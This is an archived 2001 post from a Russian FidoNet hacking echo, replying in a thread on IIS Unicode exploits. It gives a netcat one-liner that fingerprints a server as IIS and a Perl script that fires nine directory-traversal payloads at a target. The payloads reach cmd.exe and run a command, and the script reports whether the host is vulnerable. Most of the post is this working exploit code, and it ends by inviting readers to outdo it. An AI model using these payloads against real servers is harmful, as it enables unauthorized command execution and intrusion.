|
|
ru.nethack- RU.NETHACK ------------------------------------------------------------------- From : Andras 2:5020/400 07 Jun 2001 16:07:49 To : All Subject : Re: UNICODE exploits -------------------------------------------------------------------------------- > > Да все уже написано: > `echo -e "GET / HTTP/1.0\\n" | nc -v -o nc.log trg_host trg_port' > давайте изощраться: echo -e "GET / HTTP/1.0\\n\\n" |nc 213.3.169.120 80|grep -c IIS возвращает 1 или 0 соответственно если IIS или нет А этот скрипт в перле проверяет на уникод уязвимость #!/usr/bin/perl use Socket; # --------------init if ($#ARGV<0) {die "Usage: unicodecheck IP:port\n";} ($host,$port)=split(/:/,@ARGV[0]); unless ($port) { $port='80' }; print "Modified by Loadammo \n"; print "Testing $host:$port : \n"; $target = inet_aton($host); $flag=0; # ---------------test method 1 #/scripts/..%255c..%255c print ".\n"; my @results=sendraw("GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 1\n";}} # ---------------test method 2 print ".\n"; my @results=sendraw("GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 2\n";}} # ---------------test method 3 print ".\n"; my @results=sendraw("GET /msadc/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 3\n";}} # ---------------test method 4 print ".\n"; my @results=sendraw("GET /msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 4\n";}} # ---------------test method 5 print ".\n"; my @results=sendraw("GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 5\n";}} # ---------------test method 6 print ".\n"; my @results=sendraw("GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 6\n";}} # ---------------test method 7 print ".\n"; my @results=sendraw("GET /scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 7\n";}} # ---------------test method 8 print ".\n"; my @results=sendraw("GET /msadc/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 8\n";}} # ---------------test method 9 print ".\n"; my @results=sendraw("GET /cgi-bin/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: \ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory of/) {$flag=1; print "vuln at step 9\n";}} # ---------------result if ($flag==1){print "Vulnerable\n";} else {print "Safe\n";} # ------------- Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } КТО ПРЕДЛОЖИТ БОЛЬШЕ ?? Андраш --- ifmail v.2.15dev5 * Origin: MTU-Intel ISP (2:5020/400) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.nethack/9104f0063c28.html, оценка из 5, голосов 10
|